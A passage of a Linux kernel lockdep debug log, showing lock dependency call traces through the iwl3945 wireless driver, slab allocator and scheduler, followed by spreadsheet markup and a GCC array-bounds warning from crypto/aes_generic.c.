__kmalloc+0xef/0x14d [ 4573.322248] [&lt;ffffffff810c1f4f&gt;] kmem_cache_create+0x211/0x2fb [ 4573.322261] [&lt;ffffffff8163df6d&gt;] key_init+0x1f/0xb1 [ 4573.322273] [&lt;ffffffff81622c6a&gt;] start_kernel+0x393/0x3e6 [ 4573.322285] [&lt;ffffffff8162229a&gt;] x86_64_start_reservations+0xaa/0xae [ 4573.322299] [&lt;ffffffff8162237f&gt;] x86_64_start_kernel+0xe1/0xe8 [ 4573.322311] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322322] } [ 4573.322327] ... key at: [&lt;ffffffff81dd7898&gt;] __key.25306+0x0/0x8 [ 4573.322339] ... acquired at: [ 4573.322344] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.322356] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322366] [&lt;ffffffff813dc446&gt;] _spin_lock+0x36/0x43 [ 4573.322378] [&lt;ffffffff810bf155&gt;] unfreeze_slab+0x57/0x124 [ 4573.322389] [&lt;ffffffff810c0341&gt;] __slab_alloc+0x147/0x557 [ 4573.322399] [&lt;ffffffff810c12da&gt;] __kmalloc_track_caller+0xeb/0x149 [ 4573.322411] [&lt;ffffffff8130ba15&gt;] __alloc_skb+0x66/0x13a [ 4573.322423] [&lt;ffffffffa017e832&gt;] iwl3945_rx_allocate+0x4f/0x119 [iwl3945] [ 4573.322445] [&lt;ffffffffa017eeea&gt;] iwl3945_rx_replenish+0x1c/0x43 [iwl3945] [ 4573.322465] [&lt;ffffffffa0182c3a&gt;] iwl3945_hw_nic_init+0x10b/0x3bc [iwl3945] [ 4573.322487] [&lt;ffffffffa017b019&gt;] __iwl3945_up+0x14d/0x24a [iwl3945] [ 4573.322506] [&lt;ffffffffa017b754&gt;] iwl3945_mac_start+0x5f8/0x794 [iwl3945] [ 4573.322526] [&lt;ffffffffa00f2235&gt;] ieee80211_open+0x2a1/0x6dd [mac80211] [ 4573.322558] [&lt;ffffffff81313f4e&gt;] dev_open+0x7c/0xbd [ 4573.322568] [&lt;ffffffff8131399f&gt;] dev_change_flags+0xba/0x180 [ 4573.322579] [&lt;ffffffff8131bede&gt;] do_setlink+0x307/0x3cf [ 4573.322590] [&lt;ffffffff8131c0d1&gt;] rtnl_setlink+0x12b/0x142 [ 4573.322600] [&lt;ffffffff8131d085&gt;] rtnetlink_rcv_msg+0x1d8/0x1f9 [ 4573.322612] [&lt;ffffffff81327251&gt;] netlink_rcv_skb+0x3e/0x8d [ 4573.322623] [&lt;ffffffff8131cea3&gt;] rtnetlink_rcv+0x29/0x33 [ 4573.322634] [&lt;ffffffff81326db3&gt;] netlink_unicast+0x117/0x180 [ 4573.322645] [&lt;ffffffff81327093&gt;] netlink_sendmsg+0x277/0x28a [ 4573.322656] [&lt;ffffffff813032b2&gt;] __sock_sendmsg+0x59/0x62 [ 4573.322667] [&lt;ffffffff81303bda&gt;] sock_sendmsg+0xc7/0xe0 [ 4573.322677] [&lt;ffffffff81303e07&gt;] sys_sendmsg+0x214/0x29b [ 4573.322688] [&lt;ffffffff8100bc6b&gt;] system_call_fastpath+0x16/0x1b [ 4573.322700] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322710] [ 4573.322714] -&gt; (&amp;zone-&gt;lock){..-...} ops: 128829 { [ 4573.322729] IN-SOFTIRQ-W at: [ 4573.322736] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322748] INITIAL USE at: [ 4573.322755] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.322768] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322780] [&lt;ffffffff813dc446&gt;] _spin_lock+0x36/0x43 [ 4573.322793] [&lt;ffffffff8109c553&gt;] free_pages_bulk+0x2b/0x8b [ 4573.322805] [&lt;ffffffff8109cff6&gt;] free_hot_cold_page+0x14c/0x1be [ 4573.322817] [&lt;ffffffff8109d0c0&gt;] free_hot_page+0xb/0xd [ 4573.322828] [&lt;ffffffff8109d0e8&gt;] __free_pages+0x26/0x2f [ 4573.322840] [&lt;ffffffff8165450f&gt;] __free_pages_bootmem+0x7e/0x80 [ 4573.322853] [&lt;ffffffff81638e80&gt;] free_all_bootmem_core+0xf3/0x1c2 [ 4573.322867] [&lt;ffffffff81638f5f&gt;] free_all_bootmem+0x10/0x12 [ 4573.322879] [&lt;ffffffff816331c9&gt;] mem_init+0x1e/0x161 [ 4573.322891] [&lt;ffffffff81622bfc&gt;] start_kernel+0x325/0x3e6 [ 4573.322902] [&lt;ffffffff8162229a&gt;] x86_64_start_reservations+0xaa/0xae [ 4573.322916] [&lt;ffffffff8162237f&gt;] x86_64_start_kernel+0xe1/0xe8 [ 4573.322929] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322940] } [ 4573.322944] ... key at: [&lt;ffffffff81dd5570&gt;] __key.30048+0x0/0x8 [ 4573.322955] ... acquired at: [ 4573.322959] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.322971] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.322981] [&lt;ffffffff8109d487&gt;] get_page_from_freelist+0x313/0x5df [ 4573.322981] [&lt;ffffffff8109da71&gt;] __alloc_pages_internal+0x101/0x463 [ 4573.322981] [&lt;ffffffff810c01f4&gt;] alloc_slab_page+0x20/0x26 [ 4573.322981] [&lt;ffffffff810c0440&gt;] __slab_alloc+0x246/0x557 [ 4573.322981] [&lt;ffffffff810c12da&gt;] __kmalloc_track_caller+0xeb/0x149 [ 4573.322981] [&lt;ffffffff8130ba15&gt;] __alloc_skb+0x66/0x13a [ 4573.322981] [&lt;ffffffffa017e832&gt;] iwl3945_rx_allocate+0x4f/0x119 [iwl3945] [ 4573.322981] [&lt;ffffffffa017eeea&gt;] iwl3945_rx_replenish+0x1c/0x43 [iwl3945] [ 4573.322981] [&lt;ffffffffa0182c3a&gt;] iwl3945_hw_nic_init+0x10b/0x3bc [iwl3945] [ 4573.322981] [&lt;ffffffffa017b019&gt;] __iwl3945_up+0x14d/0x24a [iwl3945] [ 4573.322981] [&lt;ffffffffa017b754&gt;] iwl3945_mac_start+0x5f8/0x794 [iwl3945] [ 4573.322981] [&lt;ffffffffa00f2235&gt;] ieee80211_open+0x2a1/0x6dd [mac80211] [ 4573.322981] [&lt;ffffffff81313f4e&gt;] dev_open+0x7c/0xbd [ 4573.322981] [&lt;ffffffff8131399f&gt;] dev_change_flags+0xba/0x180 [ 4573.322981] [&lt;ffffffff8131bede&gt;] do_setlink+0x307/0x3cf [ 4573.322981] [&lt;ffffffff8131c0d1&gt;] rtnl_setlink+0x12b/0x142 [ 4573.322981] [&lt;ffffffff8131d085&gt;] rtnetlink_rcv_msg+0x1d8/0x1f9 [ 4573.322981] [&lt;ffffffff81327251&gt;] netlink_rcv_skb+0x3e/0x8d [ 4573.322981] [&lt;ffffffff8131cea3&gt;] rtnetlink_rcv+0x29/0x33 [ 4573.322981] [&lt;ffffffff81326db3&gt;] netlink_unicast+0x117/0x180 [ 4573.322981] [&lt;ffffffff81327093&gt;] netlink_sendmsg+0x277/0x28a [ 4573.322981] [&lt;ffffffff813032b2&gt;] __sock_sendmsg+0x59/0x62 [ 4573.322981] [&lt;ffffffff81303bda&gt;] sock_sendmsg+0xc7/0xe0 [ 4573.322981] [&lt;ffffffff81303e07&gt;] sys_sendmsg+0x214/0x29b [ 4573.322981] [&lt;ffffffff8100bc6b&gt;] system_call_fastpath+0x16/0x1b [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] [ 4573.322981] ... acquired at: [ 4573.322981] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.322981] [&lt;ffffffffa017e92a&gt;] iwl3945_rx_queue_restock+0x2e/0x135 [iwl3945] [ 4573.322981] [&lt;ffffffffa017eefd&gt;] iwl3945_rx_replenish+0x2f/0x43 [iwl3945] [ 4573.322981] [&lt;ffffffffa0182c3a&gt;] iwl3945_hw_nic_init+0x10b/0x3bc [iwl3945] [ 4573.322981] [&lt;ffffffffa017b019&gt;] __iwl3945_up+0x14d/0x24a [iwl3945] [ 4573.322981] [&lt;ffffffffa017b754&gt;] iwl3945_mac_start+0x5f8/0x794 [iwl3945] [ 4573.322981] [&lt;ffffffffa00f2235&gt;] ieee80211_open+0x2a1/0x6dd [mac80211] [ 4573.322981] [&lt;ffffffff81313f4e&gt;] dev_open+0x7c/0xbd [ 4573.322981] [&lt;ffffffff8131399f&gt;] dev_change_flags+0xba/0x180 [ 4573.322981] [&lt;ffffffff8131bede&gt;] do_setlink+0x307/0x3cf [ 4573.322981] [&lt;ffffffff8131c0d1&gt;] rtnl_setlink+0x12b/0x142 [ 4573.322981] [&lt;ffffffff8131d085&gt;] rtnetlink_rcv_msg+0x1d8/0x1f9 [ 4573.322981] [&lt;ffffffff81327251&gt;] netlink_rcv_skb+0x3e/0x8d [ 4573.322981] [&lt;ffffffff8131cea3&gt;] rtnetlink_rcv+0x29/0x33 [ 4573.322981] [&lt;ffffffff81326db3&gt;] netlink_unicast+0x117/0x180 [ 4573.322981] [&lt;ffffffff81327093&gt;] netlink_sendmsg+0x277/0x28a [ 4573.322981] [&lt;ffffffff813032b2&gt;] __sock_sendmsg+0x59/0x62 [ 4573.322981] [&lt;ffffffff81303bda&gt;] sock_sendmsg+0xc7/0xe0 [ 4573.322981] [&lt;ffffffff81303e07&gt;] sys_sendmsg+0x214/0x29b [ 4573.322981] [&lt;ffffffff8100bc6b&gt;] system_call_fastpath+0x16/0x1b [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] [ 4573.322981] -&gt; (&amp;base-&gt;lock){..-...} ops: 2511018 { [ 4573.322981] IN-SOFTIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] INITIAL USE at: [ 4573.322981] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.322981] [&lt;ffffffff810450fd&gt;] lock_timer_base+0x26/0x4a [ 4573.322981] [&lt;ffffffff81045750&gt;] __mod_timer+0x3a/0xe6 [ 4573.322981] [&lt;ffffffff8104586e&gt;] mod_timer+0x1c/0x1e [ 4573.322981] [&lt;ffffffff81646c5c&gt;] con_init+0xc5/0x23b [ 4573.322981] [&lt;ffffffff816463e2&gt;] console_init+0x19/0x2b [ 4573.322981] [&lt;ffffffff81622b51&gt;] start_kernel+0x27a/0x3e6 [ 4573.322981] [&lt;ffffffff8162229a&gt;] x86_64_start_reservations+0xaa/0xae [ 4573.322981] [&lt;ffffffff8162237f&gt;] x86_64_start_kernel+0xe1/0xe8 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] } [ 4573.322981] ... key at: [&lt;ffffffff816ddad8&gt;] __key.23361+0x0/0x8 [ 4573.322981] ... acquired at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] [ 4573.322981] -&gt; (&amp;q-&gt;lock){-.-.-.} ops: 26125342 { [ 4573.322981] IN-HARDIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] IN-SOFTIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] IN-RECLAIM_FS-W at: [ 4573.322981] [&lt;ffffffff8105f95c&gt;] __lock_acquire+0x31e/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.322981] [&lt;ffffffff81050397&gt;] prepare_to_wait+0x1c/0x5e [ 4573.322981] [&lt;ffffffff810a36b5&gt;] kswapd+0xd8/0x65f [ 4573.322981] [&lt;ffffffff8104fd51&gt;] kthread+0x56/0x83 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] INITIAL USE at: [ 4573.322981] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc4d7&gt;] _spin_lock_irq+0x3c/0x49 [ 4573.322981] [&lt;ffffffff813d97c3&gt;] wait_for_common+0x35/0xfb [ 4573.322981] [&lt;ffffffff813d9913&gt;] wait_for_completion+0x18/0x1a [ 4573.322981] [&lt;ffffffff8104ffe5&gt;] kthread_create+0xa8/0x163 [ 4573.322981] [&lt;ffffffff813d6e26&gt;] migration_call+0x47/0x496 [ 4573.322981] [&lt;ffffffff816348e8&gt;] migration_init+0x22/0x58 [ 4573.322981] [&lt;ffffffff8100906b&gt;] do_one_initcall+0x65/0x153 [ 4573.322981] [&lt;ffffffff81622574&gt;] kernel_init+0x64/0x183 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] } [ 4573.322981] ... key at: [&lt;ffffffff816de1e8&gt;] __key.17866+0x0/0x8 [ 4573.322981] -&gt; (&amp;rq-&gt;lock){-.-.-.} ops: 10029772 { [ 4573.322981] IN-HARDIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] IN-SOFTIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] IN-RECLAIM_FS-W at: [ 4573.322981] [&lt;ffffffff8105f95c&gt;] __lock_acquire+0x31e/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc446&gt;] _spin_lock+0x36/0x43 [ 4573.322981] [&lt;ffffffff8102fc32&gt;] task_rq_lock+0x3e/0x70 [ 4573.322981] [&lt;ffffffff81037832&gt;] set_cpus_allowed_ptr+0x1c/0x105 [ 4573.322981] [&lt;ffffffff810a364c&gt;] kswapd+0x6f/0x65f [ 4573.322981] [&lt;ffffffff8104fd51&gt;] kthread+0x56/0x83 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] INITIAL USE at: [ 4573.322981] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.322981] [&lt;ffffffff81032de6&gt;] rq_attach_root+0x16/0xcb [ 4573.322981] [&lt;ffffffff81634737&gt;] sched_init+0x35a/0x4e9 [ 4573.322981] [&lt;ffffffff81622a65&gt;] start_kernel+0x18e/0x3e6 [ 4573.322981] [&lt;ffffffff8162229a&gt;] x86_64_start_reservations+0xaa/0xae [ 4573.322981] [&lt;ffffffff8162237f&gt;] x86_64_start_kernel+0xe1/0xe8 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] } [ 4573.322981] ... key at: [&lt;ffffffff81699220&gt;] __key.45720+0x0/0x8 [ 4573.322981] -&gt; (&amp;vec-&gt;lock){-.-...} ops: 24940 { [ 4573.322981] IN-HARDIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] IN-SOFTIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] INITIAL USE at: [ 4573.322981] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.322981] [&lt;ffffffff810973a5&gt;] cpupri_set+0xd3/0x135 [ 4573.322981] [&lt;ffffffff81030d82&gt;] rq_online_rt+0x6a/0x6e [ 4573.322981] [&lt;ffffffff8102f0bf&gt;] set_rq_online+0x48/0x55 [ 4573.322981] [&lt;ffffffff81032e71&gt;] rq_attach_root+0xa1/0xcb [ 4573.322981] [&lt;ffffffff81634737&gt;] sched_init+0x35a/0x4e9 [ 4573.322981] [&lt;ffffffff81622a65&gt;] start_kernel+0x18e/0x3e6 [ 4573.322981] [&lt;ffffffff8162229a&gt;] x86_64_start_reservations+0xaa/0xae [ 4573.322981] [&lt;ffffffff8162237f&gt;] x86_64_start_kernel+0xe1/0xe8 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] } [ 4573.322981] ... key at: [&lt;ffffffff81dd54c8&gt;] __key.14696+0x0/0x38 [ 4573.322981] ... acquired at: [ 4573.322981] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.322981] [&lt;ffffffff810973a5&gt;] cpupri_set+0xd3/0x135 [ 4573.322981] [&lt;ffffffff81030d82&gt;] rq_online_rt+0x6a/0x6e [ 4573.322981] [&lt;ffffffff8102f0bf&gt;] set_rq_online+0x48/0x55 [ 4573.322981] [&lt;ffffffff81032e71&gt;] rq_attach_root+0xa1/0xcb [ 4573.322981] [&lt;ffffffff81634737&gt;] sched_init+0x35a/0x4e9 [ 4573.322981] [&lt;ffffffff81622a65&gt;] start_kernel+0x18e/0x3e6 [ 4573.322981] [&lt;ffffffff8162229a&gt;] x86_64_start_reservations+0xaa/0xae [ 4573.322981] [&lt;ffffffff8162237f&gt;] x86_64_start_kernel+0xe1/0xe8 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] [ 4573.322981] -&gt; (&amp;rt_b-&gt;rt_runtime_lock){-.-...} ops: 4564 { [ 4573.322981] IN-HARDIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] IN-SOFTIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] INITIAL USE at: [ 4573.322981] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc446&gt;] _spin_lock+0x36/0x43 [ 4573.322981] [&lt;ffffffff81031419&gt;] enqueue_task_rt+0x199/0x253 [ 4573.322981] [&lt;ffffffff8102eb2c&gt;] enqueue_task+0x5b/0x66 [ 4573.322981] [&lt;ffffffff8102ec3b&gt;] activate_task+0x28/0x31 [ 4573.322981] [&lt;ffffffff810370bb&gt;] try_to_wake_up+0x1c0/0x2fa [ 4573.322981] [&lt;ffffffff81037221&gt;] wake_up_process+0x10/0x12 [ 4573.322981] [&lt;ffffffff813d6eb6&gt;] migration_call+0xd7/0x496 [ 4573.322981] [&lt;ffffffff8163490a&gt;] migration_init+0x44/0x58 [ 4573.322981] [&lt;ffffffff8100906b&gt;] do_one_initcall+0x65/0x153 [ 4573.322981] [&lt;ffffffff81622574&gt;] kernel_init+0x64/0x183 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] } [ 4573.322981] ... key at: [&lt;ffffffff81699228&gt;] __key.37731+0x0/0x8 [ 4573.322981] -&gt; (&amp;cpu_base-&gt;lock){-.-...} ops: 9825156 { [ 4573.322981] IN-HARDIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] IN-SOFTIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] INITIAL USE at: [ 4573.322981] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.322981] [&lt;ffffffff81052e32&gt;] lock_hrtimer_base+0x25/0x4b [ 4573.322981] [&lt;ffffffff81052f77&gt;] __hrtimer_start_range_ns+0x33/0x1de [ 4573.322981] [&lt;ffffffff81031465&gt;] enqueue_task_rt+0x1e5/0x253 [ 4573.322981] [&lt;ffffffff8102eb2c&gt;] enqueue_task+0x5b/0x66 [ 4573.322981] [&lt;ffffffff8102ec3b&gt;] activate_task+0x28/0x31 [ 4573.322981] [&lt;ffffffff810370bb&gt;] try_to_wake_up+0x1c0/0x2fa [ 4573.322981] [&lt;ffffffff81037221&gt;] wake_up_process+0x10/0x12 [ 4573.322981] [&lt;ffffffff813d6eb6&gt;] migration_call+0xd7/0x496 [ 4573.322981] [&lt;ffffffff8163490a&gt;] migration_init+0x44/0x58 [ 4573.322981] [&lt;ffffffff8100906b&gt;] do_one_initcall+0x65/0x153 [ 4573.322981] [&lt;ffffffff81622574&gt;] kernel_init+0x64/0x183 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] } [ 4573.322981] ... key at: [&lt;ffffffff816de220&gt;] __key.19924+0x0/0x8 [ 4573.322981] ... acquired at: [ 4573.322981] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc525&gt;] _spin_lock_irqsave+0x41/0x54 [ 4573.322981] [&lt;ffffffff81052e32&gt;] lock_hrtimer_base+0x25/0x4b [ 4573.322981] [&lt;ffffffff81052f77&gt;] __hrtimer_start_range_ns+0x33/0x1de [ 4573.322981] [&lt;ffffffff81031465&gt;] enqueue_task_rt+0x1e5/0x253 [ 4573.322981] [&lt;ffffffff8102eb2c&gt;] enqueue_task+0x5b/0x66 [ 4573.322981] [&lt;ffffffff8102ec3b&gt;] activate_task+0x28/0x31 [ 4573.322981] [&lt;ffffffff810370bb&gt;] try_to_wake_up+0x1c0/0x2fa [ 4573.322981] [&lt;ffffffff81037221&gt;] wake_up_process+0x10/0x12 [ 4573.322981] [&lt;ffffffff813d6eb6&gt;] migration_call+0xd7/0x496 [ 4573.322981] [&lt;ffffffff8163490a&gt;] migration_init+0x44/0x58 [ 4573.322981] [&lt;ffffffff8100906b&gt;] do_one_initcall+0x65/0x153 [ 4573.322981] [&lt;ffffffff81622574&gt;] kernel_init+0x64/0x183 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] [ 4573.322981] -&gt; (&amp;rt_rq-&gt;rt_runtime_lock){-.-...} ops: 17246 { [ 4573.322981] IN-HARDIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] IN-SOFTIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] INITIAL USE at: [ 4573.322981] [&lt;ffffffff8105f975&gt;] __lock_acquire+0x337/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc446&gt;] _spin_lock+0x36/0x43 [ 4573.322981] [&lt;ffffffff81035690&gt;] update_curr_rt+0x98/0x123 [ 4573.322981] [&lt;ffffffff8103583f&gt;] dequeue_task_rt+0x1f/0x74 [ 4573.322981] [&lt;ffffffff8102ec08&gt;] dequeue_task+0xd1/0xdc [ 4573.322981] [&lt;ffffffff8102ec6c&gt;] deactivate_task+0x28/0x31 [ 4573.322981] [&lt;ffffffff813d9b06&gt;] __schedule+0x1b0/0x88c [ 4573.322981] [&lt;ffffffff813da2a5&gt;] schedule+0x13/0x3d [ 4573.322981] [&lt;ffffffff81037d53&gt;] migration_thread+0x19f/0x245 [ 4573.322981] [&lt;ffffffff8104fd51&gt;] kthread+0x56/0x83 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] } [ 4573.322981] ... key at: [&lt;ffffffff81699230&gt;] __key.45675+0x0/0x8 [ 4573.322981] ... acquired at: [ 4573.322981] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc446&gt;] _spin_lock+0x36/0x43 [ 4573.322981] [&lt;ffffffff8102ffe1&gt;] __enable_runtime+0x38/0x78 [ 4573.322981] [&lt;ffffffff81030d66&gt;] rq_online_rt+0x4e/0x6e [ 4573.322981] [&lt;ffffffff8102f0bf&gt;] set_rq_online+0x48/0x55 [ 4573.322981] [&lt;ffffffff813d6ef3&gt;] migration_call+0x114/0x496 [ 4573.322981] [&lt;ffffffff813def6d&gt;] notifier_call_chain+0x5e/0x92 [ 4573.322981] [&lt;ffffffff8105407c&gt;] raw_notifier_call_chain+0xf/0x11 [ 4573.322981] [&lt;ffffffff813d73fd&gt;] _cpu_up+0xe0/0x12f [ 4573.322981] [&lt;ffffffff813d74af&gt;] cpu_up+0x63/0x78 [ 4573.322981] [&lt;ffffffff816225c5&gt;] kernel_init+0xb5/0x183 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] [ 4573.322981] ... acquired at: [ 4573.322981] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc446&gt;] _spin_lock+0x36/0x43 [ 4573.322981] [&lt;ffffffff81031419&gt;] enqueue_task_rt+0x199/0x253 [ 4573.322981] [&lt;ffffffff8102eb2c&gt;] enqueue_task+0x5b/0x66 [ 4573.322981] [&lt;ffffffff8102ec3b&gt;] activate_task+0x28/0x31 [ 4573.322981] [&lt;ffffffff810370bb&gt;] try_to_wake_up+0x1c0/0x2fa [ 4573.322981] [&lt;ffffffff81037221&gt;] wake_up_process+0x10/0x12 [ 4573.322981] [&lt;ffffffff813d6eb6&gt;] migration_call+0xd7/0x496 [ 4573.322981] [&lt;ffffffff8163490a&gt;] migration_init+0x44/0x58 [ 4573.322981] [&lt;ffffffff8100906b&gt;] do_one_initcall+0x65/0x153 [ 4573.322981] [&lt;ffffffff81622574&gt;] kernel_init+0x64/0x183 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] [ 4573.322981] ... acquired at: [ 4573.322981] [&lt;ffffffff810600c6&gt;] __lock_acquire+0xa88/0xc22 [ 4573.322981] [&lt;ffffffff81060356&gt;] lock_acquire+0xf6/0x11a [ 4573.322981] [&lt;ffffffff813dc446&gt;] _spin_lock+0x36/0x43 [ 4573.322981] [&lt;ffffffff81035690&gt;] update_curr_rt+0x98/0x123 [ 4573.322981] [&lt;ffffffff8103583f&gt;] dequeue_task_rt+0x1f/0x74 [ 4573.322981] [&lt;ffffffff8102ec08&gt;] dequeue_task+0xd1/0xdc [ 4573.322981] [&lt;ffffffff8102ec6c&gt;] deactivate_task+0x28/0x31 [ 4573.322981] [&lt;ffffffff813d9b06&gt;] __schedule+0x1b0/0x88c [ 4573.322981] [&lt;ffffffff813da2a5&gt;] schedule+0x13/0x3d [ 4573.322981] [&lt;ffffffff81037d53&gt;] migration_thread+0x19f/0x245 [ 4573.322981] [&lt;ffffffff8104fd51&gt;] kthread+0x56/0x83 [ 4573.322981] [&lt;ffffffff8100cd7a&gt;] child_rip+0xa/0x20 [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] [ 4573.322981] -&gt; (&amp;rq-&gt;lock/1){..-...} ops: 10367 { [ 4573.322981] IN-SOFTIRQ-W at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] INITIAL USE at: [ 4573.322981] [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff [ 4573.322981] } [ 4573.322981] ... key at: [&lt;ffffffff81699221&gt;] __key.45720+0x1/0x8 [ 4573.322981] -&gt; (&amp;sig-&gt;cputime</t>
  </si>
  <si>
    <t>crypto/aes_generic.o crypto/aes_generic.c: In function ‘crypto_aes_expand_key’: crypto/aes_generic.c:283: warning: array subscript is above array bounds</t>
  </si>
  <si>
